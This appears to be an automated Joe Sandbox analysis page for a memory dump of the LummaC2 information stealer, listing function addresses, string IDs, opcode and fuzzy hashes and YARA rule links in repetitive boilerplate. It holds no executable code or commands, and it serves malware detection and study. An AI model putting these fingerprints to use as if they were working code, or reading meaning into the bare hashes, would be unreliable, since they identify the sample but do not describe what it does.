Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: D]+\
API String ID: 0-1174097187
Opcode ID: c0d53b17eba716bd8f9380797a541528141a38f257718c95e8459b25272af9be
Instruction ID: 4daeede4f49cd62a9c6a09c1f7d4e169463c30b854f8a3e5c9cd88f4e3842aa1
Opcode Fuzzy Hash: c0d53b17eba716bd8f9380797a541528141a38f257718c95e8459b25272af9be
Instruction Fuzzy Hash: 72524435A18301DFEB149F64EC9277BB3E1FB9A314F14C82CE48A57292E7759906CB81

Function 00A866C0 Relevance: 1.8, Strings: 1, Instructions: 544COMMON

Download Yara Rule

Strings

:, xrefs: 00A867D6

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: :
API String ID: 0-3726092367
Opcode ID: 3072b41ef941a7f20adebc9a5ea807f19830feef2e59a24fd90bbdf4cebe15b8
Instruction ID: de0237e04530f3dd08de1aaa63fba28336d700a14ad80bb6d623ad66cd66135d
Opcode Fuzzy Hash: 3072b41ef941a7f20adebc9a5ea807f19830feef2e59a24fd90bbdf4cebe15b8
Instruction Fuzzy Hash: 71F146B19083418FD714DF68989122BBBE1EFCA314F08896DE5D58B281D779D906CB92

Function 00A8A3B0 Relevance: 1.8, Strings: 1, Instructions: 504COMMON

Download Yara Rule

Strings

", xrefs: 00A8A6C1

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 737f16272858f3ef337be2358f0e61d3c412c3fad82c308082b52e8dd245e745
Instruction ID: e13aaf3b64237eed59b5ea0c1c9a495a256adf4fe9402535baa630b07e795661
Opcode Fuzzy Hash: 737f16272858f3ef337be2358f0e61d3c412c3fad82c308082b52e8dd245e745
Instruction Fuzzy Hash: 98F13871A083415FE728DF28C450A2BBBE5AFE5304F19C96EE89987382D638DD45C793

Function 00A65E30 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 00A65F66

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 9ab895739d41f0ab865343ec625439abbeff1199f3a28a60c6668c61fd6c002f
Instruction ID: 8c678754678930ca083606ab58874861622d7838e4f22f284b7a5dc8127eef2f
Opcode Fuzzy Hash: 9ab895739d41f0ab865343ec625439abbeff1199f3a28a60c6668c61fd6c002f
Instruction Fuzzy Hash: 8AB138715097819FD321CF28C88061BFBE0AFAA704F444E2DF5D997382D631EA18CB66

Function 00A968A0 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

Y, xrefs: 00A968AF

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: Y
API String ID: 2994545307-3233089245
Opcode ID: 74ae855a6f6469bc2aaebf762f47b4b805b7c0c25210c059bb626e83996a1240
Instruction ID: 1e18191fc1e9f77953cfa4508fc76dbb7a4c51a303a703130a93b7acc2af54ce
Opcode Fuzzy Hash: 74ae855a6f6469bc2aaebf762f47b4b805b7c0c25210c059bb626e83996a1240
Instruction Fuzzy Hash: 4FA1173120C7958FC7118B3895903AEBFE29FD6364F188A1CE4D6872D2E679894AC746

Function 00A7DC50 Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

8, xrefs: 00A7DDA6

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 372e2340c81461ebd4db09461ada3444f845ecd4268349f757fef3a079c8ba03
Instruction ID: aab58beaac43fe3649b18bcdecc3821bd05e1dbe8f9c5e8dd37e57ee790fa3a8
Opcode Fuzzy Hash: 372e2340c81461ebd4db09461ada3444f845ecd4268349f757fef3a079c8ba03
Instruction Fuzzy Hash: 4B71173364999147D729893C4C213BA7EA34FE7330F2DC76DE5BA8B3E1D66588068351

Function 00A8FEC0 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

8, xrefs: 00A8FFF9

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 396af8095b2c7927121dd915a480a316ad2ad6c7b6f6889d1120aebd4d13601f
Instruction ID: 94ac0f85ea0eaee8e9e5315a303d94b0847efe6c92e11175099c31220098364f
Opcode Fuzzy Hash: 396af8095b2c7927121dd915a480a316ad2ad6c7b6f6889d1120aebd4d13601f
Instruction Fuzzy Hash: C671113364A9D14BD7299A3C4C613BA7AD34B93370F2DC76DE9F68B3E1D52988058340

Function 00A7A800 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

_, xrefs: 00A7A8EC

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 79ee576eced6d944c30c85d540fda8f39f8f6e5b23879ef70cc6a42d33321842
Instruction ID: 46b499631e4ffa2a6f7c3dec639eed7a78ac9dfa27b941ead2245e85c9b2d4e1
Opcode Fuzzy Hash: 79ee576eced6d944c30c85d540fda8f39f8f6e5b23879ef70cc6a42d33321842
Instruction Fuzzy Hash: 94611B1960514019DB6CCF74849233B7EE6DF8530CF1892AEC5A9CFA9BE638C1038786

Function 00A9B813 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

,1, xrefs: 00A9B9E3

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: ,1
API String ID: 0-24929940
Opcode ID: 17f3bff5739d2d5f26066962ca1925e47c2748a1a500f5f451cf93004068c21f
Instruction ID: 8f79660a14be3812fa3afc4b9f8b37f0ae1aa84323f62a66e5bc67361d31cccb
Opcode Fuzzy Hash: 17f3bff5739d2d5f26066962ca1925e47c2748a1a500f5f451cf93004068c21f
Instruction Fuzzy Hash: 96514A75720A124BCF1CCF79DD6157A7BE2FB56304314496DC452DB3A2EB399816CB10

Function 00A9E8D0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

@, xrefs: 00A9E9AB

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 976cfcc3ed14a72152b6e6eaa8334bed102254c1bb810330fc29c3c1e9040002
Instruction ID: d795952c27a2f467f4fe09a1b35fc2499eb2329e8e14bc7dc2824275b4c3040c
Opcode Fuzzy Hash: 976cfcc3ed14a72152b6e6eaa8334bed102254c1bb810330fc29c3c1e9040002
Instruction Fuzzy Hash: 0A4102B16043119BDB14CF64CC91B7BB7E2FFC9358F18891CE5855B2A2E775A904CB82

Function 00A9DAA0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

@, xrefs: 00A9DAF0

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 3793e5c89a0db8af8f122df43c5806762520ecd6238a0b7ba003701a2c90ff29
Instruction ID: d1e7eff06c5266e3173371759e0d6a2234e5641f311123e2eea3e46782a67612
Opcode Fuzzy Hash: 3793e5c89a0db8af8f122df43c5806762520ecd6238a0b7ba003701a2c90ff29
Instruction Fuzzy Hash: FB2101B12083049FD710CF18D8C06ABB7F6FBDA368F15892CE5D987250D335A949CB52

Function 00A88290 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

$, xrefs: 00A88360

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: b26efc4f58991713d7afdc52d5286e388a2df1d6fc5c2fec731b6c0e21f01b6f
Instruction ID: f82fcfb0eceb2d986d1d14d0f203a4a635ac4cebc25bb352641b5b5d25819fc9
Opcode Fuzzy Hash: b26efc4f58991713d7afdc52d5286e388a2df1d6fc5c2fec731b6c0e21f01b6f
Instruction Fuzzy Hash: 102136366583515BE314CF659C81B5BB7B2DBC1700F0AC42CA4D99B2CAD978C80A8752

Function 00A9BC14 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

, xrefs: 00A9BC25, 00A9BC55, 00A9BC71

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 73b4157a82ceae75b464b8071652bfc88122f7c69909ada4026ee57e5978fcb2
Instruction ID: e76607df3409073ed3a943f416c6f1a7ffce008f6ca59e1e078adb39e93f2b2b
Opcode Fuzzy Hash: 73b4157a82ceae75b464b8071652bfc88122f7c69909ada4026ee57e5978fcb2
Instruction Fuzzy Hash: 94F044246245554FEBE18F78A9593BF77E0E717214F242DB8C55DE32E1DD1488814B08

Function 00A9D140 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de13c4f552dd71ce5a0f17c03eaaf95b162a3078408f36d32546c14fe0e66ac7
Instruction ID: 78f3b6231365b991a6c74e1b676694990968983f802f2cda36953275fcdc96ff
Opcode Fuzzy Hash: de13c4f552dd71ce5a0f17c03eaaf95b162a3078408f36d32546c14fe0e66ac7
Instruction Fuzzy Hash: C622D136708212CFC718CF68D89066BB7E2FF8A314F1A85ADD985873A1D7319D56CB81

Function 00A9D240 Relevance: .7, Instructions: 680COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37fc4c7996a7f22e5665d6eed6ffca6a11404b78a77de7885d175fcd9b67ddb8
Instruction ID: 428d9dcc0ab58ff8a47713f70081958018a694a30455fda2b33ddf2e02412775
Opcode Fuzzy Hash: 37fc4c7996a7f22e5665d6eed6ffca6a11404b78a77de7885d175fcd9b67ddb8
Instruction Fuzzy Hash: E512C032718212CFC718CF68D99066BB7E2EF8A314F1A85BDD585873A2D7319C56CB81

Function 00A62F40 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb72b6ec466d4e32d36ddeb4f26d381aaa9c11d38fa8675481237309f05443b9
Instruction ID: 63914fb82b5c0473fb8c37c380a0409c77ca66173ce266628885d3e6b1ffa527
Opcode Fuzzy Hash: fb72b6ec466d4e32d36ddeb4f26d381aaa9c11d38fa8675481237309f05443b9
Instruction Fuzzy Hash: FC52C1725083458FCB15CF29C0906EABBF1FF89314F198A6DE89A57341D774EA4ACB81

Function 00A66660 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bc98903d273dab90f3f0fe071acf70c8317752719965333753fbda59bd85cdc
Instruction ID: c0d62ed50cfe2798d3599179f991988088391a2137b65555754b172848d762a6
Opcode Fuzzy Hash: 2bc98903d273dab90f3f0fe071acf70c8317752719965333753fbda59bd85cdc
Instruction Fuzzy Hash: B252C0B0A08B848FEB35CB24C4943A7BBF1EB51314F14896ED5E747AC2C379A985C751

Function 00A67440 Relevance: .7, Instructions: 664COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction ID: 47ee2a99071f89cce0e708344b40cf0663e69f351e6b39b31f878017b1aca654
Opcode Fuzzy Hash: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction Fuzzy Hash: 0322C232A2C7158BC724DF18D9406AFB3F2EFD4319F29892DD9C697281D734A855CB82

Function 00A9D320 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba57aff42d6b66f289eb576c62c63b823a73e00c38ccc815fba5870d7f0c2cc0
Instruction ID: 3a457389cfce63d0c453ffbdf518b279aac4956b97813799207d2fa8d98733e5
Opcode Fuzzy Hash: ba57aff42d6b66f289eb576c62c63b823a73e00c38ccc815fba5870d7f0c2cc0
Instruction Fuzzy Hash: 6202C132718212CFC718CF68D89066BB7E2EFCA314F1A85ADD585973A1DB319D56CB80

Function 00A63960 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f80cbb196878932eb7366392b4570f7262547dd61a9679cf6ddd80fd48747229
Instruction ID: 9c38920389c72c34e45bc9d79784b5c78582bf62a4764bd156766bf766e6884d
Opcode Fuzzy Hash: f80cbb196878932eb7366392b4570f7262547dd61a9679cf6ddd80fd48747229
Instruction Fuzzy Hash: 80322372915B208FC768CF29C69052ABBF1FF45710B604A2ED6A787E90D736F946CB10

Function 00A7F700 Relevance: .6, Instructions: 589COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33ae21518b2b877fdf5cc6f9628dd83671abd098dab9ca5224e9d91f8867de0b
Instruction ID: 3df950d9b3207b2cdac0241abf0cf511a8f3e66b9857c3b6644368529d1f8f7c
Opcode Fuzzy Hash: 33ae21518b2b877fdf5cc6f9628dd83671abd098dab9ca5224e9d91f8867de0b
Instruction Fuzzy Hash: 9D525BB0619B818ED325CB3C8815797BFE5AB5A324F184A5DE0EF873D2C7B56001CB66

Function 00A9D3B0 Relevance: .6, Instructions: 579COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcc55a766bc7b9af9a3435fa4be69cff37cf2dceea92cdccf433b8e5f427110
Instruction ID: 5dee5e33d0172eb359ecc5ccf8350cd78c820a62b522ced1195da51a6c567270
Opcode Fuzzy Hash: 6bcc55a766bc7b9af9a3435fa4be69cff37cf2dceea92cdccf433b8e5f427110
Instruction Fuzzy Hash: DEF1C132718212CFC718CF68D89066BB7E2EFCA314F1A85ADD88597391DB319D56CB81

Function 00A9D450 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

